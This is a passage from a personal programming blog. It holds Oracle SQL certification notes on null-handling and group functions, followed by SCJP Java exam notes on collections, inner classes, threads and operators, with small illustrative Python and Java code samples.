<span id="cb9-6"><a aria-hidden="true" href="#cb9-6" tabindex="-1"></a><span class="fu">TO_NUMBER</span>(<span class="fl">123.56</span>,<span class="st">'999.9'</span>) returns an error, <span class="cf">while</span> <span class="fu">TO_CHAR</span>(<span class="fl">123.56</span>,<span class="st">'999.9'</span>) returns <span class="dv">123</span>.<span class="fl">6.</span></span></code></pre></div>
<ol start="10" type="1">
<li><p>NVL(original, ifnull) -> both parameters are mandatory, else
ORA-00909: invalid number of arguments. .. nvl(substr(‘abc’,4),‘No
substring exists’) .. since there is no 4th character, SUBSTR returns
null and hence ‘No substring exists’ is returned</p></li>
<li><p>NVL2(original, ifnotnull, ifnull) .. The data types of the
ifnotnull and ifnull parameters must be compatible, and they cannot be
of type LONG. .. They must either be of the same type, or it must be
possible to convert ifnull to the type of the ifnotnull parameter. ->
ORA-01722: invalid number .. The data type returned by the NVL2 function
is the same as that of the ifnotnull parameter</p></li>
<li><p>NULLIF(ifunequal, comparison_term) -> returns NULL if both
terms are equal else the first term .. NO IMPLICIT conversion ->
nullif(‘24-JUL-2009’,‘24-JUL-09’) returns the first term as these are
not equal</p></li>
<li><p>COALESCE(expr1, expr2,…,exprn), where expr1 is returned if it is
not null, else expr2 if it is not null, and so on ..
COALESCE(expr1,expr2) = NVL(expr1,expr2) .. COALESCE(expr1,expr2,expr3)
= NVL(expr1,NVL(expr2,expr3)) .. The data type COALESCE returns if a not
null value is found is the same as that of the first not null parameter.
.. To avoid an “ORA-00932: inconsistent data types” error, all not null
parameters must have data types compatible with the first not null
parameter</p></li>
<li><p>The DECODE function is specific to Oracle, while the CASE
expression is ANSI SQL compliant</p></li>
<li><p>DECODE(expr1,comp1, iftrue1, [comp2,iftrue2…[ compN,iftrueN]],
[iffalse])</p></li>
<li><p>CASE expression, in its simple form (CASE search_expr) and its
searched form (CASE WHEN condition)</p></li>
</ol>
<div class="sourceCode" id="cb10"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb10-1"><a aria-hidden="true" href="#cb10-1" tabindex="-1"></a><span class="cf">CASE</span> search_expr</span>
<span id="cb10-2"><a aria-hidden="true" href="#cb10-2" tabindex="-1"></a> <span class="cf">WHEN</span> comparison_expr1 <span class="cf">THEN</span> iftrue1</span>
<span id="cb10-3"><a aria-hidden="true" href="#cb10-3" tabindex="-1"></a> [<span class="cf">WHEN</span> comparison_expr2 <span class="cf">THEN</span> iftrue2</span>
<span id="cb10-4"><a aria-hidden="true" href="#cb10-4" tabindex="-1"></a> <span class="op">..</span></span>
<span id="cb10-5"><a aria-hidden="true" href="#cb10-5" tabindex="-1"></a> <span class="cf">WHEN</span> comparison_exprN <span class="cf">THEN</span> iftrueN</span>
<span id="cb10-6"><a aria-hidden="true" href="#cb10-6" tabindex="-1"></a> <span class="cf">ELSE</span> iffalse]</span>
<span id="cb10-7"><a aria-hidden="true" href="#cb10-7" tabindex="-1"></a> <span class="cf">END</span></span>
<span id="cb10-8"><a aria-hidden="true" href="#cb10-8" tabindex="-1"></a></span>
<span id="cb10-9"><a aria-hidden="true" href="#cb10-9" tabindex="-1"></a> <span class="cf">CASE</span></span>
<span id="cb10-10"><a aria-hidden="true" href="#cb10-10" tabindex="-1"></a> <span class="cf">WHEN</span> condition1 <span class="cf">THEN</span> iftrue1</span>
<span id="cb10-11"><a aria-hidden="true" href="#cb10-11" tabindex="-1"></a> [<span class="cf">WHEN</span> condition2 <span class="cf">THEN</span> iftrue2</span>
<span id="cb10-12"><a aria-hidden="true" href="#cb10-12" tabindex="-1"></a> <span class="op">..</span>.</span>
<span id="cb10-13"><a aria-hidden="true" href="#cb10-13" tabindex="-1"></a> <span class="cf">WHEN</span> conditionN <span class="cf">THEN</span> iftrueN</span>
<span id="cb10-14"><a aria-hidden="true" href="#cb10-14" tabindex="-1"></a> <span class="cf">ELSE</span> iffalse]</span>
<span id="cb10-15"><a aria-hidden="true" href="#cb10-15" tabindex="-1"></a> <span class="cf">END</span></span></code></pre></div>
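<p>The null-handling and conditional functions in this chapter (NVL,
NVL2, NULLIF, COALESCE, DECODE) follow simple rules that can be
sketched in Python with <code>None</code> standing in for NULL. These
are hypothetical helper functions written for illustration; they ignore
Oracle's data type compatibility checks.</p>

```python
def nvl(original, if_null):
    """Return if_null when original is NULL, else original."""
    return if_null if original is None else original


def nvl2(original, if_not_null, if_null):
    """Return if_not_null when original is not NULL, else if_null."""
    return if_null if original is None else if_not_null


def nullif(if_unequal, comparison_term):
    """Return NULL when both terms are equal, else the first term."""
    return None if if_unequal == comparison_term else if_unequal


def coalesce(*exprs):
    """Return the first argument that is not NULL, or NULL if all are."""
    return next((e for e in exprs if e is not None), None)


def decode(expr, *args):
    """DECODE(expr, comp1, iftrue1, ..., [iffalse]) as an if/else chain."""
    # An odd number of remaining arguments means a trailing iffalse default
    pairs, default = (args[:-1], args[-1]) if len(args) % 2 else (args, None)
    for comp, result in zip(pairs[0::2], pairs[1::2]):
        if expr == comp:
            return result
    return default


print(nvl(None, "No substring exists"))
print(coalesce(None, None, 3), decode(2, 1, "one", 2, "two", "other"))
```

<p>The sketch also shows why COALESCE(expr1,expr2) behaves like
NVL(expr1,expr2): both return the first value that is not null.</p>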
<h3 id="chapter-6">Chapter 6</h3>
<ol type="1">
<li>COUNT({*|[DISTINCT|ALL] expr}) ; .. The ALL keyword is part of the
default syntax, so COUNT(ALL expr) and COUNT(expr) are equivalent ..
These count the number of nonnull occurrences of expr in each group ..
Data Type allowed: NUMBER, DATE, CHAR, or VARCHAR2</li>
<li>AVG([DISTINCT|ALL] expr) -> AVG(ALL expr) and AVG(expr) add the
nonnull values of expr for each row and divide the sum by the number of
nonnull rows in the group. .. Data Type allowed: NUMBER</li>
<li>SUM([DISTINCT|ALL] expr) -> Data Type allowed: NUMBER</li>
<li>MAX([DISTINCT|ALL] expr); MIN([DISTINCT|ALL] expr) .. Data Type
allowed: NUMBER, DATE, CHAR, or VARCHAR2</li>
<li>VARIANCE([DISTINCT|ALL] expr); STDDEV([DISTINCT|ALL] expr); ..
Statistical variance refers to the variability of scores in a sample or
set of data. .. VARIANCE(DISTINCT expr) returns the variability of
unique nonnull data in a group. .. STDDEV calculates statistical
standard deviation, which is the degree of deviation from the mean value
in a group. It is derived by finding the square root of the variance. ..
Data Type allowed: NUMBER</li>
<li>Group functions may only be nested two levels deep -> ORA-00935:
group function is nested too deeply.</li>
<li>Select Statement</li>
</ol>
<div class="sourceCode" id="cb11"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb11-1"><a aria-hidden="true" href="#cb11-1" tabindex="-1"></a><span class="kw">SELECT</span> {<span class="kw">column</span>|expression|group_function(<span class="kw">column</span>|expression [alias]),<span class="op">..</span>.}</span>
<span id="cb11-2"><a aria-hidden="true" href="#cb11-2" tabindex="-1"></a> <span class="kw">FROM</span> <span class="kw">table</span></span>
<span id="cb11-3"><a aria-hidden="true" href="#cb11-3" tabindex="-1"></a> [<span class="kw">WHERE</span> condition(s)]</span>
<span id="cb11-4"><a aria-hidden="true" href="#cb11-4" tabindex="-1"></a> [<span class="kw">GROUP</span> <span class="kw">BY</span> {col(s)|expr}]</span>
<span id="cb11-5"><a aria-hidden="true" href="#cb11-5" tabindex="-1"></a> [<span class="kw">ORDER</span> <span class="kw">BY</span> {col(s)|expr|numeric_pos} [<span class="kw">ASC</span>|<span class="kw">DESC</span>] [<span class="kw">NULLS</span> <span class="fu">FIRST</span>|<span class="fu">LAST</span>]];</span></code></pre></div>
<ol start="8" type="1">
<li>If an item, which is not a group function, appears in the SELECT
list and there is no GROUP BY clause, -> ORA-00937: not a
single-group group function .. If a GROUP BY clause is present but that
item is not a grouping attribute, -> ORA-00979: not a GROUP BY
expression .. If a group function is placed in a WHERE clause ->
ORA-00934: group function is not allowed here</li>
<li>Select Statement with the HAVING clause</li>
</ol>
<div class="sourceCode" id="cb12"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb12-1"><a aria-hidden="true" href="#cb12-1" tabindex="-1"></a><span class="kw">SELECT</span> {<span class="kw">column</span>|expression|group_function(<span class="kw">column</span>|expression [alias]),…}</span>
<span id="cb12-2"><a aria-hidden="true" href="#cb12-2" tabindex="-1"></a> <span class="kw">FROM</span> <span class="kw">table</span></span>
<span id="cb12-3"><a aria-hidden="true" href="#cb12-3" tabindex="-1"></a> [<span class="kw">WHERE</span> condition(s)]</span>
<span id="cb12-4"><a aria-hidden="true" href="#cb12-4" tabindex="-1"></a> [<span class="kw">GROUP</span> <span class="kw">BY</span> {col(s)|expr}]</span>
<span id="cb12-5"><a aria-hidden="true" href="#cb12-5" tabindex="-1"></a> [<span class="kw">HAVING</span> group_condition(s)]</span>
<span id="cb12-6"><a aria-hidden="true" href="#cb12-6" tabindex="-1"></a> [<span class="kw">ORDER</span> <span class="kw">BY</span> {col(s)|expr|numeric_pos} [<span class="kw">ASC</span>|<span class="kw">DESC</span>] [<span class="kw">NULLS</span> <span class="fu">FIRST</span>|<span class="fu">LAST</span>]];</span></code></pre></div>
<ol start="10" type="1">
<li><p>The HAVING clause can occur before the GROUP BY clause in the
SELECT statement. .. However, it is more common to place the HAVING
clause after the GROUP BY clause. .. All grouping is performed and group
functions are executed prior to evaluating the HAVING clause</p></li>
<li><p>NVL in Select clause only useful for display and NVL in WHERE or
HAVING is useful for modifying the values being verified ..
<code>NVL(x,0) -> 0</code> ..
<code>LENGTH(NVL(x,0)) -> 1</code></p></li>
</ol>
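<p>The way group functions skip nulls, and the effect of wrapping the
column in NVL, can be seen in a small Python sketch. The rows, column
names and the threshold used for the HAVING-style filter are made-up
sample data, and the dictionary keys are just labels for the
corresponding SQL expressions.</p>

```python
from collections import defaultdict
from statistics import mean

# Hypothetical (department, salary) rows; None stands in for NULL
rows = [("IT", 100), ("IT", None), ("IT", 300), ("HR", 50), ("HR", None)]

# GROUP BY department
groups = defaultdict(list)
for dept, salary in rows:
    groups[dept].append(salary)


def summarize(values):
    non_null = [v for v in values if v is not None]
    return {
        "count_star": len(values),                    # COUNT(*) counts every row
        "count_expr": len(non_null),                  # COUNT(expr) skips nulls
        "sum": sum(non_null) if non_null else None,   # SUM(expr) skips nulls
        "avg": mean(non_null) if non_null else None,  # AVG(expr) skips nulls
        # AVG(NVL(expr,0)) treats nulls as zero, so the divisor grows
        "avg_nvl": mean(0 if v is None else v for v in values),
    }


summary = {dept: summarize(vals) for dept, vals in groups.items()}

# HAVING AVG(salary) > 100 is evaluated after grouping
having = {d: s for d, s in summary.items() if s["avg"] is not None and s["avg"] > 100}

for dept, stats in summary.items():
    print(dept, stats)
print("HAVING avg > 100:", list(having))
```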
<p>Continued in <a href="studying-for-ocp-oracle-certifed-professional-part-2">Part
2</a></p>
<p>Aceing SCJP - Notes from Kathy Sierra Prep book - Part 2</p>
<p>Senthilkumar Gopal, 2008-09-08</p>
<p>I recently completed the Sun Certified Java Programmer from Sun
Microsystems and thought of sharing my notes and gotchas from the Kathy
Sierra SCJP preparation book which was the best material to prepare for
this certification. All the notes below are extracted from
<a href="https://www.amazon.com/SCJP-Certified-Programmer-Java-310-065/dp/0071591060">Kathy
Sierra’s book</a>. They are from the 2008 edition and might not
reflect the latest chapter specifics.</p>
<p>This is the continuation of the <a href="aceing-scjp-notes-from-kathy-sierra-prep-book-part-1">Part 1</a>
notes.</p>
<h3 id="chapter-7">Chapter 7</h3>
<ol type="1">
<li>Comparing two reference variables of different hierarchies gives
COMPILATION error</li>
<li>STRINGBUFFER does NOT have an overridden equals method. However,
STRING and WRAPPER classes have them</li>
<li><code>equals()</code> => Reflexive (x.x), Symmetric (x.y) and
Transitive (x.y.z) and consistent</li>
<li>If two objects are equal then their hashcodes should be equal</li>
<li><code>equals()</code> takes an OBJECT as its parameter and returns boolean.
<code>hashCode()</code> returns int</li>
<li>Refer to Hashcode Contract and Table</li>
<li>Refer to Types of Collections</li>
<li>Only List and Set extend Collection not Map</li>
<li><code>java.util.Collection</code> is the super-interface of List and Set
while <code>java.util.Collections</code> is the class with
utilities</li>
<li>Refer to Collection Class Hierarchy</li>
<li>An implementation of collection can NEVER be Unordered if it is
sorted but all other combinations are possible</li>
<li><em>HashSet</em> - UnOrdered and UnSorted. <em>LinkedHashSet</em> -
Ordered and UnSorted</li>
<li>Vector (synchronized) and ArrayList are the only two classes covered here that
implement RandomAccess</li>
<li><em>LinkedHashMap</em> can be iterated in the Order of Entry or in
the Order of Last access (useful for caching); <em>LinkedHashSet</em>
only keeps the Order of Entry</li>
<li><em>TreeSet</em> uses a Red-Black tree structure to keep elements in their natural Ordering
and has a constructor that takes a Comparator for defining a custom ordering of the
Objects</li>
<li><em>Hashtable</em> is synchronized and does NOT allow a null key
while HashMap is not synchronized and allows one null key</li>
<li>Refer to Collection Interfaces and Concrete Implementation
Classes</li>
</ol>
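<p>The equals/hashCode and null-key points above can be sketched as follows. This is a minimal illustration written against a current JDK (generics and the diamond operator postdate the 2008 book); <code>Point</code> and <code>CollectionNotesDemo</code> are hypothetical names, not classes from the book.</p>

```java
import java.util.HashMap;
import java.util.HashSet;
import java.util.Hashtable;
import java.util.Map;
import java.util.Set;

class CollectionNotesDemo {
    // HashSet relies on equals()/hashCode(): two equal points count once.
    static int distinctPoints() {
        Set<Point> points = new HashSet<>();
        points.add(new Point(1, 2));
        points.add(new Point(1, 2));
        return points.size();
    }

    // HashMap accepts one null key.
    static boolean hashMapAcceptsNullKey() {
        Map<String, Integer> map = new HashMap<>();
        map.put(null, 1);
        return map.containsKey(null);
    }

    // Hashtable rejects a null key with a NullPointerException.
    static boolean hashtableRejectsNullKey() {
        Map<String, Integer> table = new Hashtable<>();
        try {
            table.put(null, 1);
            return false;
        } catch (NullPointerException expected) {
            return true;
        }
    }

    public static void main(String[] args) {
        System.out.println(distinctPoints());
        System.out.println(hashMapAcceptsNullKey());
        System.out.println(hashtableRejectsNullKey());
    }
}

// Hypothetical value class used only for illustration.
final class Point {
    private final int x;
    private final int y;

    Point(int x, int y) {
        this.x = x;
        this.y = y;
    }

    // equals() takes an Object (not a Point) and returns boolean.
    @Override
    public boolean equals(Object other) {
        if (this == other) return true;
        if (!(other instanceof Point)) return false;
        Point p = (Point) other;
        return x == p.x && y == p.y;
    }

    // Equal objects must produce equal hash codes.
    @Override
    public int hashCode() {
        return 31 * x + y;
    }
}
```

<p>Declaring <code>equals(Point other)</code> instead would only overload the method, and the collection classes would keep calling the inherited <code>equals(Object)</code>.</p>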
<h3 id="chapter-8">Chapter 8</h3>
<ol type="1">
<li>Top Level Nested Class is an Inner class marked static</li>
<li>When trying to create an inner class object outside the Outer Class
or in a Static method of the Outer Class, we need to CREATE an Object of
the Outer class -
<code>MyOuter.MyInner inObj = new MyOuter().new MyInner();</code></li>
<li>To Access the <em>this</em> object, the outer class <em>this</em> is
referred as <em>MyOuter.this</em> within the innerclass instance
members</li>
<li>The Inner class members can be STATIC only if the inner class itself
is declared as STATIC</li>
<li>Modifiers for the CLASS LEVEL inner class are : <em>final, abstract,
public</em> (allowed for all classes), <em>private, protected</em> and
<em>static</em> (only for inner classes)</li>
<li>Modifiers for the METHOD LEVEL inner class are: abstract and final
(cannot be used together)</li>
</ol>
<ul>
<li>Method Level inner Class CANNOT access the method local variables
unless they are marked final</li>
<li>It can access the class level variables</li>
<li>The class can be instantiated only within the method and it has to
be done only after the class declaration is completed</li>
</ul>
<ol start="7" type="1">
<li><code>Animal h = new Horse();</code> Here, since the object is
determined at runtime, ONLY THE OVERRIDDEN METHODS of HORSE and the
Animal methods can be accessed</li>
<li>For an Anonymous Inner Class, we CANNOT create an altogether new Class.
We have to either extend an existing class or implement an existing interface. This means we
can only usefully OVERRIDE the methods available: new methods can be added
in an Anonymous Inner Class, but they CANNOT be
accessed at all outside the anonymous class, as the reference type would be
that of the superclass used.</li>
<li>An anonymous Inner class
extends or implements its supertype implicitly, hence the superclass Constructor
is called when the anonymous class instance is created</li>
<li><code>Runnable r = new Runnable();</code> is a compilation error as
Runnable is an Interface. However,
<code>Runnable r = new Runnable() {public void run(){}};</code> is
valid</li>
<li>When the anonymous class is created within the argument of a method,
the closing semicolon appears after the argument close bracket:
<code>});</code></li>
<li>A static nested class does not have access to the non-static members
(instance variables and methods) of the outer class. Look out for questions which do
this</li>
</ol>
<ul>
<li>Normal Class:
<code>MyOuter.MyInner inObj = new MyOuter().new MyInner();</code></li>
<li>Static Class:
<code>MyOuter.MyInner inObj = new MyOuter.MyInner();</code></li>
</ul>
<ol start="13" type="1">
<li>Static Nested Class can have both static and non-static members but
can access ONLY the static members of the outer class</li>
<li>When an anonymous class implements an interface, it should override
the abstract methods else compilation error occurs</li>
<li>Check for the CORRECT Presence of the Semicolons before going into
the syntax and logic checking for inner classes</li>
<li><code>Object o = new Horse("zippo"); Horse h = (Horse) o; h.eat();</code>
If the cast to Horse is not done, then the reference can access only
the OBJECT methods, including the ones Horse overrides</li>
</ol>
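<p>The instantiation rules for inner, static nested and anonymous classes can be sketched like this. It is only an illustration: <code>MyNested</code>, <code>InnerClassDemo</code> and the field names are assumptions added here, while <code>MyOuter</code> and <code>MyInner</code> follow the names used in the notes.</p>

```java
class InnerClassDemo {
    // A regular inner class needs an instance of the outer class.
    static String innerDescription() {
        MyOuter.MyInner inner = new MyOuter().new MyInner();
        return inner.describe();
    }

    // A static nested class is created without an outer instance.
    static String nestedDescription() {
        MyOuter.MyNested nested = new MyOuter.MyNested();
        return nested.describe();
    }

    // An anonymous class implements Runnable; note the closing "};".
    static String anonymousResult() {
        final StringBuilder log = new StringBuilder();
        Runnable r = new Runnable() {
            public void run() {
                log.append("ran");
            }
        };
        r.run();
        return log.toString();
    }

    public static void main(String[] args) {
        System.out.println(innerDescription());
        System.out.println(nestedDescription());
        System.out.println(anonymousResult());
    }
}

class MyOuter {
    private String name = "outer";
    private static String label = "static-outer";

    // Regular inner class: tied to an instance of MyOuter.
    class MyInner {
        String describe() {
            // MyOuter.this refers to the enclosing instance.
            return "inner of " + MyOuter.this.name;
        }
    }

    // Static nested class: no enclosing instance, so only the static
    // members of MyOuter can be used directly.
    static class MyNested {
        String describe() {
            return "nested sees " + label;
        }
    }
}
```

<p>Replacing <code>label</code> with <code>name</code> inside <code>MyNested</code> would not compile, which is the kind of trap the notes warn about.</p>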
<h3 id="chapter-9">Chapter 9</h3>
<ol type="1">
<li><code>start()</code>, <code>run()</code>, <code>yield()</code> and
<code>sleep()</code> - <em>Important methods in Threads</em></li>
<li>Ways of Instantiating a Thread:</li>
</ol>
<ul>
<li>Extends Thread - <code>MyThread t = new MyThread();</code></li>
</ul>
<ol start="3" type="1">
<li>Implements Runnable -
<code>MyRunnable r = new MyRunnable(); Thread t = new Thread(r);</code></li>
<li>Calling <code>run()</code> directly DOES NOT start a new call stack, though it is
legal. We have to use <code>t.start()</code> for starting the execution
in a new stack</li>
<li>Methods for Influencing Execution Control of Threads</li>
</ol>
<ul>
<li>java.lang.Thread - static sleep(long), static yield(), final join(),
final setPriority(int)</li>
<li>java.lang.Object - final wait(), final notify(), final notifyAll()</li>
</ul>
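<p>The difference between calling <code>run()</code> and <code>start()</code> can be checked with a small sketch. <code>ThreadStartDemo</code>, <code>NameRecorder</code> and the thread name <code>"worker"</code> are hypothetical names chosen for this illustration.</p>

```java
class ThreadStartDemo {
    // Remembers the name of the thread that actually executed run().
    static class NameRecorder implements Runnable {
        volatile String executedBy;

        public void run() {
            executedBy = Thread.currentThread().getName();
        }
    }

    // Waits for a thread to finish, converting the checked exception.
    private static void joinQuietly(Thread t) {
        try {
            t.join();
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
            throw new IllegalStateException(e);
        }
    }

    // Calling run() directly is legal but executes on the caller's stack.
    static boolean runStaysOnCallerThread() {
        NameRecorder recorder = new NameRecorder();
        Thread t = new Thread(recorder, "worker");
        t.run();
        return recorder.executedBy.equals(Thread.currentThread().getName());
    }

    // start() schedules run() on a new thread named "worker".
    static String startUsesNewThread() {
        NameRecorder recorder = new NameRecorder();
        Thread t = new Thread(recorder, "worker");
        t.start();
        joinQuietly(t);
        return recorder.executedBy;
    }

    // A thread that has already been started cannot be started again.
    static boolean secondStartFails() {
        Thread t = new Thread(new NameRecorder());
        t.start();
        joinQuietly(t);
        try {
            t.start();
            return false;
        } catch (IllegalThreadStateException expected) {
            return true;
        }
    }

    public static void main(String[] args) {
        System.out.println(runStaysOnCallerThread());
        System.out.println(startUsesNewThread());
        System.out.println(secondStartFails());
    }
}
```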
<ol start="6" type="1">
<li><code>sleep</code> - guaranteed to sleep for at least the given time unless
interrupted (InterruptedException)</li>
<li><code>yield</code> - may give control back to the scheduler, but the thread is not guaranteed to
stop running</li>
<li><code>join</code> - guaranteed to stop execution of the current thread until the joined
thread completes</li>
<li>All three methods above keep any locks the thread has acquired.</li>
<li>Notes about <em>synchronized</em>:</li>
</ol>
<ul>
<li>Only methods (or blocks) can be synchronized, not variables or classes</li>
<li>Each object has only one lock</li>
<li>No need to synchronize all the methods in a class</li>
<li>multiple threads can still access the non-synchronized methods</li>
<li>When a thread goes to sleep, it takes the lock with it</li>
<li>When a thread acquires the lock on an object, no other thread can
enter any of the synchronized methods of that object</li>
<li>A thread can have multiple locks</li>
</ul>
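<p>A minimal sketch of the locking notes above, assuming a hypothetical <code>Counter</code> class shared by two threads. With both methods synchronized on the same object the final count is deterministic; the class and method names are illustrative only.</p>

```java
class SynchronizedCounterDemo {
    // Both methods lock on the same Counter instance (one lock per object).
    static class Counter {
        private int count;

        synchronized void increment() {
            count++;
        }

        synchronized int get() {
            return count;
        }
    }

    // Two threads share one Counter; synchronization prevents lost updates.
    static int countWithTwoThreads(final int perThread) {
        final Counter counter = new Counter();
        Runnable work = new Runnable() {
            public void run() {
                for (int i = 0; i < perThread; i++) {
                    counter.increment();
                }
            }
        };
        Thread a = new Thread(work);
        Thread b = new Thread(work);
        a.start();
        b.start();
        try {
            a.join();
            b.join();
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
            throw new IllegalStateException(e);
        }
        return counter.get();
    }

    // A single thread can hold several locks at the same time.
    static boolean threadCanHoldSeveralLocks() {
        Object first = new Object();
        Object second = new Object();
        synchronized (first) {
            synchronized (second) {
                return Thread.holdsLock(first) && Thread.holdsLock(second);
            }
        }
    }

    public static void main(String[] args) {
        System.out.println(countWithTwoThreads(10000));
        System.out.println(threadCanHoldSeveralLocks());
    }
}
```

<p>Removing <code>synchronized</code> from <code>increment()</code> would make the total unpredictable, because <code>count++</code> is a read followed by a write.</p>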
<ol start="11" type="1">
<li><code>wait</code>, <code>notify</code> and
<code>notifyAll</code> (methods of java.lang.Object) should be called
from within a synchronized block because the thread has to own the lock before
waiting or notifying; otherwise an IllegalMonitorStateException is thrown</li>
<li>Even when notify is called, the object lock will NOT be released
until the end of the synchronized block</li>
<li>Refer to Key Thread Methods</li>
<li>Check for <code>sleep()</code> or <code>wait()</code> method without
a try-catch block for checked (InterruptedException)</li>
<li>Check for the same thread being started twice</li>
<li>Check for synchronized being used on a non-object (for example a primitive)</li>
<li>Synchronizing the code that calls the calculating method DOES NOT
synchronize the action, the synchronized block needs to be applied to
the method doing the actual calculation.</li>
<li>Don’t synchronize the run() method or the code inside it as there
might be multiple threads created and each will have its own run method.
So synchronize the called method</li>
<li>When two threads are created and a single object is used for
accessing the methods, the wait, notify should be within synchronized
block as the thread should own the lock of the object before the methods
are called. Otherwise, it will throw a runtime exception</li>
<li>When superclass object reference is used for a sub class object,
only the OVERRIDEN methods can be accessed and the variables if printed
are from SUPER CLASS only</li>
<li>return type should always be immediately before the method name or
compilation error</li>
<li>A reference passed into a method is passed as if it were a copy of a
pointer rather than the actual object. Thus if that reference is
assigned to a null it makes no difference to any other copy of that
pointer. Thus the code within the method findOut makes no difference to
any other references. Although reference z is assigned to null reference
y still points to the object so no objects are eligible for garbage
collection.</li>
<li>Because of the way twos complement number representation works the
unsigned right shift operation means a small shift in a negative number
can return a very large value so the output of option 1 will be much
larger than 10.</li>
<li>The unsigned right shift places no significance on the leading bit
that indicates the sign. For this shift the value 1 of the bit sign is
replaced with a zero turning the result into a positive number for
option 2.</li>
<li>Shifting a byte, short, char or int ALWAYS returns an int (32 bit),
because the smaller types are promoted to int first</li>
<li>If shifting is done on a long, then the result is always a long (64
bit)</li>
<li>An else clause always belongs to the innermost if without an else,
irrespective of the indentation</li>
</ol>
<ul>
<li>In switch case, no two case values can be the same</li>
<li>If switching on a byte, case 128 gives compilation error</li>
<li>Only compile-time constants (literals or final variables initialized with a constant) can be used in a case, since the value must be
known at compile time</li>
</ul>
<ol start="28" type="1">
<li>assertions are for situations that will never happen</li>
<li><code>assert(true check)</code> - Throws AssertionError if the tests
failed</li>
<li><code>assert(check) : expression</code> - check is always boolean
and expression is never void</li>
<li>assert is a keyword</li>
<li>If there is any statement between the label and the loop, then that
label is NOT recognized and hence a compilation error occurs. Also,
labels can be of the same name and the innermost one is taken into
consideration</li>
<li>Escape sequences are allowed only for <code>\b</code>, <code>\t</code>, <code>\n</code>, <code>\f</code>, <code>\r</code>, <code>\"</code>, <code>\'</code> and <code>\\</code>
</li>
<li><code>#,%</code> cannot be used in a variable name and a number
cannot be used at the start of a variable name</li>
<li>If a variable is final and its value lies within the range of the target type,
a cast is not needed. <code>final short s1 = 1;</code></li>
<li><code>byte s2 = s1;</code> - compiles correctly</li>
<li><em>true</em>, <em>false</em> and <em>null</em> are
case-SENSITIVE</li>
<li>A call to the super class method can be done using <code>super.methodName()</code>
and can be placed anywhere in the method (Static rule applies). Similarly
the superclass variables can be accessed using <code>super.</code></li>
<li>The REFERENCE type decides which overloaded method is being called,
while OBJECT type decides which overridden method is called. In fact,
<code>Animal a = new Horse(); a.eat("Carrots");</code> gives a COMPILATION
ERROR when only Horse declares <code>eat(String)</code>, as the reference type is used to check that the method exists</li>
<li>When using <code>super()</code> or <code>this()</code> to invoke
constructors, they must be on the first line. Any methods that need to
be used needs to be static as the object would not be created until the
SUPER constructor completes</li>
<li><code>return (long) x/y</code> will give a float when y is a float, as the cast applies only
to x. Also int/int gives only int.</li>
<li>ALWAYS check the NUMERATOR and DENOMINATOR For the return type. If
either Num or Denom is float or double then the result is also float or
double</li>
</ol>
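<p>A few of the rules in this chapter (shift result types, the unsigned right shift, the scope of a cast, and the lock requirement for <code>notify</code>) can be checked with a short sketch. The class and method names are hypothetical, and autoboxing into <code>Object</code> is used here only as a way to observe the static result type.</p>

```java
class ShiftAndCastDemo {
    // Unsigned right shift fills the left side with zero bits.
    static int unsignedShiftOfNegative() {
        return -8 >>> 1;
    }

    // Signed right shift copies the sign bit.
    static int signedShiftOfNegative() {
        return -8 >> 1;
    }

    // A byte operand is promoted, so the shift result is an int.
    static boolean byteShiftYieldsInt() {
        byte b = 8;
        Object result = b >> 1;
        return result instanceof Integer;
    }

    // Shifting a long yields a long.
    static boolean longShiftYieldsLong() {
        long value = 8L;
        Object result = value >> 1;
        return result instanceof Long;
    }

    // The cast applies to x only, so long / float is a float.
    static boolean castAppliesToNumeratorOnly() {
        int x = 7;
        float y = 2f;
        Object result = (long) x / y;
        return result instanceof Float;
    }

    // With an int denominator the division is integral and truncates.
    static long integerDivisionTruncates() {
        int x = 7;
        int y = 2;
        return (long) x / y;
    }

    // notify() outside a synchronized block fails at runtime.
    static boolean notifyWithoutLockFails() {
        try {
            new Object().notify();
            return false;
        } catch (IllegalMonitorStateException expected) {
            return true;
        }
    }

    public static void main(String[] args) {
        System.out.println(unsignedShiftOfNegative());
        System.out.println(signedShiftOfNegative());
        System.out.println(integerDivisionTruncates());
        System.out.println(notifyWithoutLockFails());
    }
}
```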
<h3 id="miscellaneous">Miscellaneous</h3>
<ol type="1">
<li>First Check for Access Modifiers</li>
<li>Check for static code referring to non-static members</li>
<li>Check for illegal subclassing</li>
<li>Watch for method or class names that look like keywords but are not on the keyword
list. Bitwise complement: <code>x = 3 => ~x = -4</code>, i.e. <code>~x = -(x + 1)</code></li>
<li><code>int []a3,[]a4;</code> here after a comma only a variable
should be present</li>
<li>ALWAYS remember that once one branch of an if/else-if chain is executed, all the other else if/else
branches will NOT be executed</li>
<li>Even if the called method is static, <em>this</em> can NEVER be used
inside a static method</li>
<li><em>==</em> will work correctly for STRING values if No new String
Objects are created. <code>"john" == "john"</code> works correctly.</li>
<li><code>start()</code> method is used to schedule a thread for
execution</li>
<li><em>protected void finalize() throws Throwable</em></li>
<li><em>concat()</em> is a method of String while append is for
StringBuffer</li>
<li>All the methods in StringBuffer are synchronized</li>
</ol>Aceing SCJP - Notes from Kathy Sierra Prep book - Part 12008-09-03T00:00:00-07:002008-09-03T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2008-09-03:/posts/aceing-scjp-notes-from-kathy-sierra-prep-book-part-1.htmlI recently completed the Sun Certified Java Programmer from Sun Microsystems and thought of sharing my notes from the Kathy Sierra SCJP preparation book which was the best material to prepare for this certification.<h3 id="chapter-1">Chapter 1</h3>
<ol type="1">
<li>Read the keywords list</li>
<li>Always check variable, class and method name for the keywords</li>
<li>Variable range is -2^(bits - 1) to 2^(bits - 1) - 1</li>
<li>Ranges of primitive numbers</li>
<li>Octal (max): 21 digits and Hexadecimal (max): 16 digits without
leading 0 and 0x</li>
<li>Hexadecimal is case-Insensitive</li>
<li>Octal and Hexadecimal can be used for long also using L suffix</li>
<li>Unicode Character is represented as <code>char x = '\u004E'</code></li>
<li>char being assigned out of range integer values (above 65535 or -ve
numbers) needs a cast to (char)</li>
<li>Size should NOT be given when declaring an array int[5] x is
wrong</li>
<li>Primitive arrays initialize the variables to default value and
Object arrays to null</li>
<li>A negative array index gives ArrayIndexOutOfBoundsException
(RuntimeException)</li>
<li>Arrays has a VARIABLE known as length</li>
<li>Size should NOT be given for anonymous array int[] x = new int[]
{4,5}</li>
